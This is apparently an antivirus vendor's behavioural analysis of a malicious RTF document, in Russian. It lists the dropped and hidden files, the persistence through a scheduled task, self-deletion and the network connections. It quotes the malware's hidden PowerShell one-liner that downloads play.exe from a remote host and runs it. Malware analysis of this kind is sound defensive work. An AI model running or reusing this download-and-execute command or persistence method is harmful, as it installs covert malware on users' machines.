Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\nvmjeecyi
Вредоносные функции
Загружает и запускает на исполнение
- http://15#.#5.173.72/music/play.exe как %appdata%\play.exe
Внедряет код в
следующие пользовательские процессы:
- play.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\play.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\nvmjeecyi.exe
- %TEMP%\tmpb8d3.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\nvmjeecyi.exe
Удаляет следующие файлы
- %TEMP%\abctfhghgdghgh‹.sct
- %TEMP%\tmpb8d3.tmp
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.rtf
Самоудаляется.
Сетевая активность
Подключается к
- '15#.#5.173.72':80
- '40.#3.20.77':8700
TCP
- '40.#3.20.77':8700
Другое
Создает и запускает на исполнение
- '%APPDATA%\play.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://15#.#5.173.72/music/play.exe','%APPDATA%\play.exe');Start-Process '%AP...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\NVmJeeCyi" /XML "%TEMP%\tmpB8D3.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\NVmJeeCyi" /XML "%TEMP%\tmpB8D3.tmp"
